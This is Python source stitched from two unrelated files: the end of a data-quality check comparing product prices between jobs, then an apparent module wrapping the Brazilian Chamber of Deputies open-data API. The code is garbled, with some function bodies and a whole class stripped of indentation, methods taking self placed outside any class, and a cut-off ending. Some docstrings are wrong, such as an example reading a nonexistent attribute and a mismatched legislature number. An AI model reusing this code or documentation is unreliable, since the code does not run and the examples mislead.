        f"{len(missing_names)} names missing from the tested job",
        detailed="\n".join(details),
    )
    result.add_info(f"{len(new_names)} new names in the tested job")
    result.add_info(f"{len(same_names)} same names in both jobs")

    price_field = tagged_fields.get("product_price_field")
    if not price_field:
        result.add_info("product_price_field tag is not set")
        return result
    price_field = price_field[0]

    mismatches = 0
    details = []
    for name in same_names:
        # "nan" marks a missing value serialized as a string; skip those.
        if name.strip() == "nan":
            continue
        source_rows = source_df[source_df[name_field] == name]
        target_rows = target_df[target_df[name_field] == name]
        source_price = source_rows[price_field].iloc[0]
        target_price = target_rows[price_field].iloc[0]
        if not (is_number(source_price) and is_number(target_price)):
            continue
        if ratio_diff(source_price, target_price) > 0.1:
            mismatches += 1
            details.append(
                f"different price for {name}\nsource price is {source_price} "
                f"for {source_rows['_key'].iloc[0]}\ntarget price is {target_price} "
                f"for {target_rows['_key'].iloc[0]}"
            )
    result_msg = f"{len(same_names)} checked, {mismatches} errors"
    if details:
        result.add_error(result_msg, detailed="\n".join(details))
    else:
        result.add_info(result_msg)
    return result
|
'''
Módulo para captura dos dados abertos da Câmara dos Deputados do Brasil.
Mini-Tutorial
-------------
1. Importe o módulo `camara`.
>>> from DadosAbertosBrasil import camara
2. Busque o código do objeto de estudo utilizando as funções `lista`.
>>> camara.lista_deputados( ... )
3. Instancie o objeto de estudo utilizando o código encontrado.
>>> dep = camara.Deputado(cod)
4. Utilize os atributos da classe para obter informações básicas do objeto.
>>> dep.dados
5. Utilize os métodos da classe para obter informações detalhadas do objeto.
>>> dep.despesas( ... )
Documentação da API original
----------------------------
https://dadosabertos.camara.leg.br/swagger/api.html
'''
import pandas as _pd
from ._utils import parse
from ._utils.get_data import get_data
def _get(
        path: list,
        params: dict = None
    ) -> dict:
    '''
    Query the Câmara dos Deputados open-data API.

    Parameters
    ----------
    path : list of str
        Path segments appended to the API endpoint; every caller in this
        module passes a list, e.g. ['deputados', '74693'].
        (Fix: the previous `path: str` annotation was wrong.)
    params : dict (default=None)
        Query-string parameters forwarded to the request.

    Returns
    -------
    dict
        Raw decoded JSON payload returned by `get_data`.
    '''
    return get_data(
        endpoint = 'https://dadosabertos.camara.leg.br/api/v2/',
        path = path,
        params = params
    )
def _df(
dados: dict,
index_col: str = None
) -> _pd.DataFrame:
'''
Converte dados brutos da API em um DataFrame.
Parâmetros
----------
dados : dict
Dados brutos da API.
index_col : str (default=None)
Nome da coluna que será usada como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Dados convertidos em DataFrame.
'''
df = _pd.DataFrame(dados['dados'])
if (index_col is not None) and (not df.empty):
df.set_index(index_col, inplace=True)
return df
class Bloco:
    '''
    Information about one specific parliamentary bloc.

    Parameters
    ----------
    cod : int
        Numeric code of the desired parliamentary bloc.

    Attributes
    ----------
    dados : dict
        Full raw data set returned by the API.
    cod : int
        Numeric code of the bloc.
    legislatura : str
        Legislature of the bloc.
    nome : str
        Name of the bloc.
    uri : str
        URI for direct data collection through the API.

    Examples
    --------
    Get the name of bloc #576.
    >>> bl = camara.Bloco(cod=576)
    >>> bl.nome
    ... 'PSL, PTB'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        dados = _get(['blocos', str(cod)])['dados']
        self.cod = cod
        self.dados = dados
        self.legislatura = dados['idLegislatura']
        self.nome = dados['nome']
        self.uri = dados['uri']

    def __repr__(self):
        return 'DadosAbertosBrasil.camara: Bloco ' + self.nome
class Deputado:
    '''
    Cadastral data of a parliamentarian who, at any moment in history and
    for any period, took office in the Chamber of Deputies.

    Parameters
    ----------
    cod : int
        Numeric code of the parliamentarian.

    Attributes
    ----------
    dados : dict
        Full raw data set returned by the API.
    cod : int
        Identification code.
    condicao_eleitoral : str
        Electoral condition.
    cpf : str
        CPF number.
    descricao_status : str
        Description of the latest status.
    email : str
        E-mail address.
    escolaridade : str
        Education level.
    falecimento : str
        Date of death ('AAAA-MM-DD'); empty if the deputy has not died.
    foto : str
        Picture URL.
    gabinete : dict
        Office identification and contact information.
    legislatura : int
        ID of the most recent legislature.
    municipio_nascimento : str
        Municipality of birth.
    nascimento : str
        Date of birth ('AAAA-MM-DD').
    nome : str
        Most common name.
    nome_completo : str
        Full civil name.
    nome_eleitoral : str
        Name used during the electoral campaign.
    partido : str
        Most recent party.
    rede_social : list
        Social-network handles.
    sexo : str
        - 'M': male;
        - 'F': female.
    situacao : str
        Situation of the latest status.
    uf : str
        Federative Unit the deputy was elected by.
    uf_nascimento : str
        Federative Unit of birth.
    ultima_atualizacao : str
        Date and time of the latest status update.
    uri : str
        URI for direct data collection through the API.
    website : str
        Website URL.

    Examples
    --------
    Collect the most recent party of deputy Rodrigo Maia.
    >>> cod = 74693  # Deputy code
    >>> dep = camara.Deputado(cod=cod)
    >>> dep.partido
    ... 'DEM'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['deputados', str(cod)])['dados']
        # `ultimoStatus` groups the information of the most recent mandate.
        ultimo_status = self.dados['ultimoStatus']
        self.condicao_eleitoral = ultimo_status['condicaoEleitoral']
        self.cpf = self.dados['cpf']
        self.descricao_status = ultimo_status['descricaoStatus']
        self.email = ultimo_status['email']
        self.escolaridade = self.dados['escolaridade']
        self.falecimento = self.dados['dataFalecimento']
        self.foto = ultimo_status['urlFoto']
        self.gabinete = ultimo_status['gabinete']
        self.legislatura = ultimo_status['idLegislatura']
        self.municipio_nascimento = self.dados['municipioNascimento']
        self.nascimento = self.dados['dataNascimento']
        self.nome = ultimo_status['nome']
        self.nome_completo = self.dados['nomeCivil']
        self.nome_eleitoral = ultimo_status['nomeEleitoral']
        self.partido = ultimo_status['siglaPartido']
        self.rede_social = self.dados['redeSocial']
        self.sexo = self.dados['sexo']
        self.situacao = ultimo_status['situacao']
        self.uf = ultimo_status['siglaUf']
        self.uf_nascimento = self.dados['ufNascimento']
        self.ultima_atualizacao = ultimo_status['data']
        self.uri = self.dados['uri']
        self.website = self.dados['urlWebsite']

    def __repr__(self):
        # Bug fix: the previous implementation nested double quotes inside a
        # double-quoted f-string ({"a" if ...}), which is a SyntaxError on
        # every Python version before 3.12 (PEP 701). Compute the gendered
        # suffix first so the f-string stays portable.
        sufixo = 'a' if self.sexo == 'F' else 'o'
        return f"DadosAbertosBrasil.camara: Deputad{sufixo} {self.nome_eleitoral}"

    def despesas(
        self,
        legislatura: int = None,
        ano: int = None,
        mes: int = None,
        fornecedor: int = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'ano'
    ) -> _pd.DataFrame:
        '''
        Payments and reimbursements made by the Chamber on behalf of the
        deputy under the parliamentary-activity quota ("cota parlamentar").

        Without time parameters the API returns the six months prior to
        the request.

        Parameters
        ----------
        legislatura : int (default=None)
            ID of the legislature in which the expenses occurred.
        ano : int (default=None)
            Year in which the expenses occurred.
        mes : int (default=None)
            Month in which the expenses occurred.
        fornecedor : int (default=None)
            CNPJ (company) or CPF (person) of the supplier, digits only.
        pagina : int (default=1)
            Results page number, starting at 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) sort order.
        ordenar_por : str (default='ano')
            Field used to sort the list (any returned field, plus
            idLegislatura).

        Returns
        -------
        pandas.core.frame.DataFrame
            Expenses of the deputy's parliamentary activity.
        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if ano is not None:
            params['ano'] = ano
        if mes is not None:
            params['mes'] = mes
        if fornecedor is not None:
            params['cnpjCpfFornecedor'] = fornecedor
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'despesas']
        dados = _get(path=path, params=params)
        return _df(dados)

    def discursos(
        self,
        legislatura: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'dataHoraInicio'
    ) -> _pd.DataFrame:
        '''
        Speeches given by the deputy in any event registered in the
        Chamber's systems.

        Without time parameters the API returns the speeches of the seven
        days prior to the request.

        Parameters
        ----------
        legislatura : int (default=None)
            Legislature number the data must belong to.
        inicio : str (default=None)
            Start date of the interval, formatted 'AAAA-MM-DD'.
        fim : str (default=None)
            End date of the interval, formatted 'AAAA-MM-DD'.
        pagina : int (default=1)
            Results page number, starting at 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) sort order.
        ordenar_por : str (default='dataHoraInicio')
            Field used to sort the list.

        Returns
        -------
        pandas.core.frame.DataFrame
            Speeches given by the deputy.
        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'discursos']
        dados = _get(path=path, params=params)
        return _df(dados)

    def eventos(
        self,
        legislatura: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'dataHoraInicio',
        index: bool = False
    ) -> _pd.DataFrame:
        '''
        Events in which the deputy's participation was or is expected.

        Without time parameters the API returns a five-day window: two days
        before and two after the request.

        Parameters
        ----------
        legislatura : int (default=None)
            Legislature number the data must belong to.
        inicio : str (default=None)
            Start date of the interval, formatted 'AAAA-MM-DD'.
        fim : str (default=None)
            End date of the interval, formatted 'AAAA-MM-DD'.
        pagina : int (default=1)
            Results page number, starting at 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) sort order.
        ordenar_por : str (default='dataHoraInicio')
            Field used to sort the list.
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Events with the deputy's participation.
        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'eventos']
        dados = _get(path=path, params=params)
        index_col = 'id' if index else None
        return _df(dados, index_col)

    def frentes(
        self,
        index: bool = False
    ) -> _pd.DataFrame:
        '''
        Parliamentary fronts the deputy is (or, for past legislatures,
        finished the legislature as) a member of.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Parliamentary fronts the deputy belongs to.
        ----------------------------------------------------------------------
        '''
        path = ['deputados', str(self.cod), 'frentes']
        dados = _get(path=path, params=None)
        index_col = 'id' if index else None
        return _df(dados, index_col)

    def orgaos(
        self,
        legislatura: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'dataInicio',
        index: bool = False
    ) -> _pd.DataFrame:
        '''
        Organs (committees, prosecution offices, ...) the deputy
        participates or participated in, with the post held and the
        start/end dates of its occupation.

        Without time parameters the API returns the organs occupied at the
        moment of the request (empty if the deputy is not in office).

        Parameters
        ----------
        legislatura : int (default=None)
            NOTE(review): accepted for signature symmetry with the other
            methods but currently NOT forwarded to the API — confirm
            whether the endpoint supports idLegislatura before wiring it.
        inicio : str (default=None)
            Start date of the interval, formatted 'AAAA-MM-DD'.
        fim : str (default=None)
            End date of the interval, formatted 'AAAA-MM-DD'.
        pagina : int (default=1)
            Results page number, starting at 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) sort order.
        ordenar_por : str (default='dataInicio')
            Field used to sort the list.
        index : bool (default=False)
            If True, use the `idOrgao` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Organs the deputy is a member of.
        ----------------------------------------------------------------------
        '''
        params = {}
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'orgaos']
        dados = _get(path=path, params=params)
        index_col = 'idOrgao' if index else None
        return _df(dados, index_col)
class Evento:
    '''
    Detailed information about a Chamber of Deputies event.

    Parameters
    ----------
    cod : int
        Numeric code of the desired event.

    Attributes
    ----------
    dados : dict
        Full raw data set returned by the API.
    cod : int
        Numeric code of the event.
    andar : str
        Floor of the building where the event took place.
    descricao : str
        Event description.
    descricao_tipo : str
        Event type.
    fases : str
        Event phases.
    fim : str
        Date and time the event finished ('AAAA-MM-DD').
    inicio : str
        Date and time the event started ('AAAA-MM-DD').
    local : str
        Place where the event occurred.
    local_externo : str
        External location of the event.
    lista_orgaos : list of dict
        Organs involved and their information.
    predio : str
        Building where the event occurred.
    requerimentos : list of dict
        Event requests.
    sala : str
        Room of the building where the event occurred.
    situacao : str
        Event situation.
    uri : str
        URI for direct data collection through the API.
    uri_convidados : str
        URI for direct collection of the guests' data.
    uri_deputados : str
        URI for direct collection of the deputies' data.
    url_documento_pauta : str
        URL to view the event agenda.
    url_registro : str
        URL where the event was recorded.

    Examples
    --------
    Get the URL to watch event #59265.
    >>> ev = camara.Evento(cod=59265)
    >>> ev.url_registro
    ... 'https://www.youtube.com/watch?v=8D2gjMrTnMA'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        dados = _get(['eventos', str(cod)])['dados']
        local_camara = dados['localCamara']
        self.cod = cod
        self.dados = dados
        self.andar = local_camara['andar']
        self.descricao = dados['descricao']
        self.descricao_tipo = dados['descricaoTipo']
        self.fases = dados['fases']
        self.fim = dados['dataHoraFim']
        self.inicio = dados['dataHoraInicio']
        self.local = local_camara['nome']
        self.local_externo = dados['localExterno']
        self.lista_orgaos = dados['orgaos']
        self.predio = local_camara['predio']
        self.requerimentos = dados['requerimentos']
        self.sala = local_camara['sala']
        self.situacao = dados['situacao']
        self.uri = dados['uri']
        self.uri_convidados = dados['uriConvidados']
        self.uri_deputados = dados['uriDeputados']
        self.url_documento_pauta = dados['urlDocumentoPauta']
        self.url_registro = dados['urlRegistro']

    def __repr__(self):
        return 'DadosAbertosBrasil.camara: Evento ' + self.descricao

    def _tabela(self, recurso: str, index_col) -> _pd.DataFrame:
        # Shared fetch-and-convert step for the event's sub-resources.
        dados = _get(path=['eventos', str(self.cod), recurso], params=None)
        return _df(dados, index_col)

    def deputados(self, index: bool = False) -> _pd.DataFrame:
        '''
        Deputies attending the event.

        For past events this lists the deputies who actually registered
        attendance; for future events, those expected to attend (guests or
        members of the organ(s) responsible for the event).

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Deputies attending the event.
        ----------------------------------------------------------------------
        '''
        return self._tabela('deputados', 'id' if index else None)

    def orgaos(self, index: bool = False) -> _pd.DataFrame:
        '''
        Organs responsible for the event.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Organs organizing the event.
        ----------------------------------------------------------------------
        '''
        return self._tabela('orgaos', 'id' if index else None)

    def pauta(self, index: bool = False) -> _pd.DataFrame:
        '''
        Propositions evaluated (or scheduled for evaluation) in a
        deliberative event, with preference regime, rapporteur and opinion,
        appreciation result and vote, when available.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `ordem` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Propositions of the event.
        ----------------------------------------------------------------------
        '''
        return self._tabela('pauta', 'ordem' if index else None)

    def votacoes(self, index: bool = False) -> _pd.DataFrame:
        '''
        Basic data of the votes held in the event (votes only occur in
        deliberative events); complementary data is available per vote.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Votes held in the event.
        ----------------------------------------------------------------------
        '''
        return self._tabela('votacoes', 'id' if index else None)
class Frente:
    '''
    Detailed information about a parliamentary front.

    Parameters
    ----------
    cod : int
        Numeric code of the desired parliamentary front.

    Attributes
    ----------
    dados : dict
        Full raw data set returned by the API.
    cod : int
        Numeric code of the front.
    coordenador : dict
        Information on the front's coordinator.
    documento : str
        URL of the front's document.
    email : str
        Contact e-mail.
    id_sitacao : int
        ID of the front's situation.
    keywords : str
        Keywords of the front.
    legislatura : int
        ID of the front's legislature.
    situacao : str
        Situation of the front.
    telefone : str
        Contact phone number.
    titulo : str
        Title of the front.
    uri : str
        URI for direct data collection through the API.
    website : str
        URL of the front's website.

    Examples
    --------
    Get the title of parliamentary front #54258.
    >>> fr = camara.Frente(cod=54258)
    >>> fr.url_registro
    ... 'Frente Parlamentar Mista da Telessaúde'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        dados = _get(['frentes', str(cod)])['dados']
        self.cod = cod
        self.dados = dados
        self.coordenador = dados['coordenador']
        self.documento = dados['urlDocumento']
        self.email = dados['email']
        self.id_sitacao = dados['idSituacao']
        self.keywords = dados['keywords']
        self.legislatura = dados['idLegislatura']
        self.situacao = dados['situacao']
        self.telefone = dados['telefone']
        self.titulo = dados['titulo']
        self.uri = dados['uri']
        self.website = dados['urlWebsite']

    def __repr__(self):
        return 'DadosAbertosBrasil.camara: ' + self.titulo

    def membros(self, index: bool = False) -> _pd.DataFrame:
        '''
        Deputies belonging to the parliamentary front and the roles they
        held in it (signatory, coordinator or president). Even for mixed
        fronts (deputies and senators), only deputies are returned.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Deputies participating in the parliamentary front.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['frentes', str(self.cod), 'membros'], params=None)
        return _df(dados, 'id' if index else None)
class Legislatura:
    '''
    Extra information about a given legislature of the Chamber.

    Parameters
    ----------
    cod : int
        Numeric code of the desired legislature.

    Attributes
    ----------
    dados : dict
        Full raw data set returned by the API.
    cod : int
        Numeric code of the legislature.
    inicio : str
        First day of the legislature.
    fim : str
        Last day of the legislature.
    uri : str
        URI for direct data collection through the API.

    Examples
    --------
    Get the first and last day of legislature #56.
    >>> leg = camara.Legislatura(cod=54)
    >>> leg.inicio
    ... '2011-02-01'
    >>> leg.fim
    ... '2015-01-31'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        dados = _get(['legislaturas', str(cod)])['dados']
        self.cod = cod
        self.dados = dados
        self.fim = dados['dataFim']
        self.inicio = dados['dataInicio']
        self.uri = dados['uri']

    def __repr__(self):
        return 'DadosAbertosBrasil.camara: Legislatura {}'.format(self.cod)

    def mesa(
        self,
        inicio: str = None,
        fim: str = None,
        index: bool = False
    ) -> _pd.DataFrame:
        '''
        Deputies who held a post in the Chamber's Mesa Diretora during the
        legislature. A legislature normally has two Mesas (president, two
        vice-presidents, four secretaries and their substitutes).

        Parameters
        ----------
        inicio : str (default=None)
            Start day of the interval of interest, formatted 'AAAA-MM-DD'.
        fim : str (default=None)
            End date of the interval of interest, formatted 'AAAA-MM-DD'.
        index : bool (default=False)
            If True, use the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Deputies who composed the Mesa Diretora.
        ----------------------------------------------------------------------
        '''
        params = {}
        for chave, data in (('dataInicio', inicio), ('dataFim', fim)):
            if data is not None:
                params[chave] = parse.data(data, 'camara')
        dados = _get(path=['legislaturas', str(self.cod), 'mesa'], params=params)
        return _df(dados, 'id' if index else None)
class Orgao:
'''
Informações detalhadas sobre um órgão da Câmara.
Parâmetros
----------
cod : int
Código numérico do órgão do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do órgão.
apelido : str
Apelido do órgão.
casa : str
Casa do órgão.
cod_tipo : int
Código do tipo do órgão.
fim : str
Data final do órgão.
inicio : str
Data inicial do órgão.
instalacao : str
Data de instalação do órgão.
nome : str
Nome do órgão.
nome_publicacao : str
Nome de publicação.
sala : str
Sala do órgão.
sigla : str
Sigla do órgão.
tipo : str
Tipo do órgão.
uri : str
Endereço para coleta de dados direta pela API do órgão.
urlWebsite : str
URL para acessar o website do órgão.
Exemplos
--------
Obter o apelido do órgão #4.
>>> org = camara.Orgao(cod=4)
>>> org.apelido
... 'Mesa Diretora'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['orgaos', str(cod)])['dados']
self.apelido = self.dados['apelido']
self.casa = self.dados['casa']
self.cod_tipo = self.dados['codTipoOrgao']
self.fim = self.dados['dataFim']
self.inicio = self.dados['dataInicio']
self.instalacao = self.dados['dataInstalacao']
self.nome = self.dados['nome']
self.nome_publicacao = self.dados['nomePublicacao']
self.sala = self.dados['sala']
self.sigla = self.dados['sigla']
self.tipo = self.dados['tipoOrgao']
self.uri = self.dados['uri']
self.urlWebsite = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Órgão {self.nome}"
def eventos(
self,
tipo_evento: str = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Os eventos ocorridos ou previstos em um órgão legislativo.
Retorna uma lista de informações resumidas dos eventos realizados
(ou a realizar) pelo órgão legislativo. Por padrão, são retornados
eventos em andamento ou previstos para o mesmo dia, dois dias antes
e dois dias depois da requisição. Parâmetros podem ser passados para
alterar esse período, bem como os tipos de eventos.
Parâmetros
----------
tipo_evento : str (default=None)
Identificador numérico do tipo de evento que se deseja obter.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if tipo_evento is not None:
params['idTipoEvento'] = tipo_evento
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['orgaos', str(self.cod), 'eventos']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def membros(
        self,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    List the positions of this body and the parliamentarians holding them.

    Returns summarized data identifying each parliamentarian and the
    position they hold or held in the legislative body during a given
    period. When no period is supplied, the service returns the members
    of the body at the time of the request. If the body no longer exists
    or is not installed, an empty list is returned.

    Parameters
    ----------
    inicio : str (default=None)
        Start date of a time interval, in 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of a time interval, in 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    itens : int (default=None)
        Maximum number of items per page for this request.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Positions of the body and the parliamentarians holding them.
    ----------------------------------------------------------------------
    '''
    # Normalize the optional date filters first, then keep only the ones
    # that were actually supplied.
    filtros = {
        'dataInicio': None if inicio is None else parse.data(inicio, 'camara'),
        'dataFim': None if fim is None else parse.data(fim, 'camara'),
    }
    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    dados = _get(path=['orgaos', str(self.cod), 'membros'], params=params)
    return _df(dados, 'id' if index else None)
def votacoes(
        self,
        proposicao: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = False,
        ordenar_por: str = 'dataHoraRegistro',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Basic data on voting sessions held in this legislative body.

    Returns a list of basic data on voting sessions that took place in
    events held in the body. If this is a permanent body of the Chamber,
    by default data on the votes held in the last 30 days is returned.
    That period can be changed with the `inicio` and/or `fim` parameters,
    which for now are limited to selecting votes that occurred within a
    single year. If this is a temporary body, such as a special
    committee, by default all votes ever held in the body are listed.
    Complementary data on each listed vote can be obtained with the
    `camara.Votacao` object.

    Parameters
    ----------
    proposicao : int (default=None)
        Numeric code of a proposition, obtainable via
        `camara.lista_proposicoes`. If present, only votes that had the
        proposition as their object, or that affected it, are listed.
    inicio : str (default=None)
        Start date of a time interval, in 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of a time interval, in 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Results page number, starting at 1, containing the number of
        items defined by the `itens` parameter. Defaults to 1 if omitted.
    itens : int (default=None)
        Maximum number of items per page for this request.
    asc : bool (default=False)
        Whether records are sorted in ascending order:
        - True: A to Z or 0 to 9 (ascending);
        - False: Z to A or 9 to 0 (descending).
    ordenar_por : str (default='dataHoraRegistro')
        Which element of the representation is used to sort the list.
    index : bool (default=False)
        If True, sets the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of voting sessions held in the legislative body.
    ----------------------------------------------------------------------
    '''
    params = {}
    if proposicao is not None:
        params['idProposicao'] = proposicao
    if inicio is not None:
        params['dataInicio'] = parse.data(inicio, 'camara')
    if fim is not None:
        params['dataFim'] = parse.data(fim, 'camara')
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    path = ['orgaos', str(self.cod), 'votacoes']
    dados = _get(path=path, params=params)
    index_col = 'id' if index else None
    return _df(dados, index_col)
class Partido:
    '''
    Detailed information about a political party.

    Parameters
    ----------
    cod : int
        Numeric code of the desired party.

    Attributes
    ----------
    dados : dict
        Full raw payload returned by the API.
    cod : int
        Numeric code of the party.
    facebook : str
        URL of the party's Facebook page.
    legislatura : str
        Numeric code of the latest legislature.
    lider : dict
        Information about the party's leader.
    logo : str
        URL of the party's logo.
    nome : str
        Full name of the party.
    numero : int
        Electoral number of the party.
    sigla : str
        Abbreviation of the party.
    situacao : str
        Current status of the party.
    total_membros : str
        Total number of party members.
    total_posse : str
        Total number of party members sworn in.
    ultima_atualizacao : str
        Timestamp of the last update of the party's information.
    uri : str
        API endpoint for direct data collection about the party.
    uri_membros : str
        API endpoint for direct data collection about the party members.
    website : str
        URL of the party's website.

    Examples
    --------
    Get the full name of party #36899.
    >>> p = camara.Partido(cod=36899)
    >>> p.nome
    ... 'Movimento Democrático Brasileiro'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['partidos', str(cod)])['dados']
        # Shorthand for the nested `status` record queried repeatedly below.
        status = self.dados['status']
        self.facebook = self.dados['urlFacebook']
        self.legislatura = status['idLegislatura']
        self.lider = status['lider']
        self.logo = self.dados['urlLogo']
        self.nome = self.dados['nome']
        self.numero = self.dados['numeroEleitoral']
        self.sigla = self.dados['sigla']
        self.situacao = status['situacao']
        self.total_membros = status['totalMembros']
        self.total_posse = status['totalPosse']
        self.ultima_atualizacao = status['data']
        self.uri = self.dados['uri']
        self.uri_membros = status['uriMembros']
        self.website = self.dados['urlWebSite']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: {self.nome}"

    def membros(
            self,
            inicio: str = None,
            fim: str = None,
            legislatura: int = None,
            pagina: int = 1,
            itens: int = None,
            ordenar_por: str = None,
            asc: bool = True,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        List of the parliamentarians of a party during a given period.

        Returns a list of deputies that are or were in office for the
        party. Optionally, the `inicio`, `fim` or `legislatura` parameters
        restrict the list to deputies affiliated with the party during a
        certain time interval. This is equivalent to `lista_deputados`
        filtered by party, but works better for members of parties that
        no longer exist.

        Parameters
        ----------
        inicio : str (default=None)
            Start date of a time interval, in 'AAAA-MM-DD' format.
        fim : str (default=None)
            End date of a time interval, in 'AAAA-MM-DD' format.
        legislatura : int (default=None)
            Legislature number the requested data must correspond to.
        pagina : int (default=1)
            Results page number, starting at 1, containing the number of
            items defined by the `itens` parameter. Defaults to 1.
        itens : int (default=None)
            Maximum number of items per page for this request.
        asc : bool (default=True)
            Whether records are sorted in ascending order:
            - True: A to Z or 0 to 9 (ascending);
            - False: Z to A or 9 to 0 (descending).
        ordenar_por : str (default=None)
            Which element of the representation is used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Parliamentarians of the party during the period.
        ----------------------------------------------------------------------
        '''
        # Keep only the optional filters the caller actually supplied.
        filtros = {
